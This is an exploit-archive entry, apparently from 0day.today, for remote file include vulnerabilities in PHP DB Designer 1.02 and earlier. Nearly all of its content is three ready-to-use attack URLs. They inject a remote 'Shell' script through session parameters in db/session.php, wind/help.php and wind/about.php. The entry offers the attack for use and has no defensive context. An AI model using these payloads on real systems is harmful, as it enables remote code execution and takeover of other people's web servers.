id: 1603
date: 03/16/2007
title: PHP DB Designer <= 1.02 Remote File Include Vulnerabilities
author: GoLd_M
cves: 

===========================================================
PHP DB Designer <= 1.02 Remote File Include Vulnerabilities
===========================================================




# PHP DB Designer <= 1.02 Remote File Include Exploit
# D.Script: http://sourceforge.net/projects/phpdbdesigner/
# Discovered by: GloD_M = [Mahmood_ali]
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Exploit:[Path]/db/session.php?_SESSION[DRIVER]=Shell
# Exploit:[Path]/wind/help.php?_SESSION[SITE_PATH]=Shell
# Exploit:[Path]/wind/about.php?_SESSION[SITE_PATH]=Shell



#  0day.today [2023-03-24]  #